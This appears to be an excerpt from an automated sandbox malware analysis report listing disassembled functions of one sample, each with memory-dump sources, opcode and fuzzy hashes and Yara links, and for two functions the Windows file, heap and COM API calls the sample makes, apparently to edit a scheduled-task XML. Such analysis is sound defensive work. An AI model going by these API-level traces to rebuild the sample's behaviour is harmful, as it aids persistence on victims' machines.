                                                                                                                                                                                                            Function 004416C0 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
                                                                                                                                                                                                            • Instruction ID: 5c11e9432c662da9e832bb00048f610cc01de9b2e0be984bbf0aa46c625adfee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE02E630A007459FEB24CF18C9916AFB7E1EF92310F14855FE4A69B3A1D738A982C759
                                                                                                                                                                                                            Function 0043F190 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
                                                                                                                                                                                                            • Instruction ID: 6f27e782664b546ea9a7b70d93e541e4de47497114ddd59825f0d455be94bf6b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE02F430E007459FDB24CF28C581AAF77E1AF99310F14956FE8A58B391D738AD4ACB94
                                                                                                                                                                                                            Function 00408FB0 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 88621d46758aedf690ac812344085eee3c67f3b628deeb412a6ed4927ae68baa
                                                                                                                                                                                                            • Instruction ID: e4885def972384e71c6d3d4fa2c3ca7822b4fe2f95aa3e637cc98f64f0d57cdc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88621d46758aedf690ac812344085eee3c67f3b628deeb412a6ed4927ae68baa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F19B71A0021AABDB20CF98C984BAFB7B5EF88314F14417AED05A7381D779DD41CBA5
                                                                                                                                                                                                            Function 004386F0 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2e8fd1392c8e8ca8671e57119c901ec34dab3edcf339fcd96841df010c3a8279
                                                                                                                                                                                                            • Instruction ID: fb58a9955cc4d1b946931b1175dba42f0bbce99fa4b1ebf213060499804b6f98
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e8fd1392c8e8ca8671e57119c901ec34dab3edcf339fcd96841df010c3a8279
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 991236B1E002198FCF18CF99C9905ADFBF2BF98314F18916EE849AB754D738A941CB54
                                                                                                                                                                                                            Function 0043E340 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fda3bc7136fad63692ea13eb0df83ff4ace332ecd58bb5a45ea7b06bc79ff9bd
                                                                                                                                                                                                            • Instruction ID: f84bb95602b786eda625d293fa24169cae21de97630f021d2562301d3a5a23f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fda3bc7136fad63692ea13eb0df83ff4ace332ecd58bb5a45ea7b06bc79ff9bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E18A309067859FDB25CF2AC8816BE7BE1AF6A314F14816FD4E54B3C1C638AD46CB48
                                                                                                                                                                                                            Function 00448360 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 67012e555016796dca32be15a4a4708593d4b9cfb006d1ee6d7d65e73d46c3ae
                                                                                                                                                                                                            • Instruction ID: d50c75c3876421525f344fdd73dc0d94e20a485c8d9004176434aa332c09f1d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67012e555016796dca32be15a4a4708593d4b9cfb006d1ee6d7d65e73d46c3ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E1F530A045558FDB08CF68C8806ADBBF2EF85314B29C1AED895DB346DA39DA46CB54
                                                                                                                                                                                                            Function 00439B90 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e42fcb3eab6dfdb7d92a05da4ca5687e3eaacf820ae962d547ea67b0616ab27e
                                                                                                                                                                                                            • Instruction ID: 225706b8245442841e5fafbb32bd6a2fabd71da86d83268e1d7ace3ee5cdc439
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e42fcb3eab6dfdb7d92a05da4ca5687e3eaacf820ae962d547ea67b0616ab27e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FD12572E0021A8FCB18CF99C9815AEFBF2FF98310F24952AD855AB744D774AD01CB94
                                                                                                                                                                                                            Function 00406B60 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                            • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                            Function 0044BFE3 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                            • Instruction ID: b8886794a6e5007edff55ecb8f40356a68830081a2fd7a3c661494ca94f11cdd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1581C5319893918BC795DF38C8D56D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                            Function 0043A6D0 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
                                                                                                                                                                                                            • Instruction ID: 74367e3e6ab0b74d7f5c1cf3bcaa0d89af6e6a6e1ec9fa16ff19e2e679a1abb2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 031776b64819325f8bc44260e121548c68ef4edaa7e8b27829c2e6f5598c06c9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5551C633F219214BF348CA79CC8415A73D3EBCE31071AC27AD901D7295E974E96396C5
                                                                                                                                                                                                            Function 0040DDA0 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
                                                                                                                                                                                                            • Instruction ID: 6b590965bade377d4829cb5edd661b89940232f3d33fb21e100e917a0d425a21
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90413d9f9a7a2a51136cfd3257986b2c0b32359f2b68ce7d43070aef4feff374
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6518E7190D3928BD311CF29C48066BFBE1AFD9314F048A6EF8C4A7351D7788A49CB96
                                                                                                                                                                                                            Function 0043A4F0 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
                                                                                                                                                                                                            • Instruction ID: e5d6b1d35e3d87a4e74f21fc64f62253c0a3e01d769b06703654ef7c4b1d687f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f940f7e9c8dad2819d7ac41217777f41bdb57ab302bde7adc409946197b50135
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F941C377E51A3947F3188949CD81754AA52ABCC324F2B83B5CD2C6B316D8B9ED039AD0
                                                                                                                                                                                                            Function 0040DFC0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                            • Instruction ID: d8d0adafabcbd5d708f1da50a49402fb3bf4ae1d939e6727f3124d8f61b49aed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED51A17150C3A18BD315CF2AC48066BBBE1BBC9314F048E6EE8D497351D778DA09CB96
                                                                                                                                                                                                            Function 0042CF60 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                            • Instruction ID: c0d06c3b42bc6b51c97fcab68d65b60e5fd230549ea87696981b9f88f0129265
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00214F339748B601E7504B718D586227BD2CFCB206FAF81B5D644C7992D63ED4029564
                                                                                                                                                                                                            Function 0040DA50 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                            • Instruction ID: 83a3f7d0e66a37bb7e6fdedb80276840f88715c9868f56da058082779efa7e5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101C92BB7CE0E45C51940AC1424A6A11801B127657D4063BAAC7F83D5EFEDD86FD84F
                                                                                                                                                                                                            Function 00412FF0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                            • Instruction ID: b04785f1e362cafcd50622ec6ea8703a75b25b73c25fc77f3c2a0d59776fd131
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B01F7B19053189FEB20CF94DD8579BBBF4FB01305F40809DE98D93240C3755644CB96
                                                                                                                                                                                                            Function 00406800 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                            • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                            Function 00403579 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035AB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035F7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035FE
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004036D3
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 004036F2
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403725
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004037BB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004037EC
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 004037F3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004037FA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0040382B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403887
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040388A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403897
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040389A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038AD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038B0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038BD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004038C0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                            • String ID: 00-->$<Actions $p=5w
                                                                                                                                                                                                            • API String ID: 3028510665-3742188657
                                                                                                                                                                                                            • Opcode ID: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
                                                                                                                                                                                                            • Instruction ID: 60e659956de6826fb5c9e3504b81639812d481b549725b71a5a6ffd7b5f9c5d4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 955b91e7d97598c02b1fd98b2500fdb02c6b2481e78ce23fabddc674594c4510
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBA1CEB2504311ABC720DF64CC48F5B7BA8EFC8751F048669FA45EB291D774EA04CBA8
                                                                                                                                                                                                            Function 00402F30 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,?,7702DB30), ref: 00402F40
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402F60
                                                                                                                                                                                                            • CoCreateInstance.OLE32(004043F0,00000000,00000001,004041E0,?), ref: 00402F87
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402F9F
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402FBA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402FD8
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402FF6
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040307C
                                                                                                                                                                                                            • CreateFileMappingW.KERNELBASE(?), ref: 00403082
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403088
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040308E
                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004035B6), ref: 004030CD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00404EEC), ref: 00403276
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0040329B
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004032B9
                                                                                                                                                                                                              • Part of subcall function 00402E50: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004030A1,00404ED8), ref: 00402E58
                                                                                                                                                                                                              • Part of subcall function 00402E50: HeapAlloc.KERNEL32(00000000,?,004030A1,00404ED8), ref: 00402E5F
                                                                                                                                                                                                              • Part of subcall function 00402E50: SysAllocString.OLEAUT32(004030A1), ref: 00402E80
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403366
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040336C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403372
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
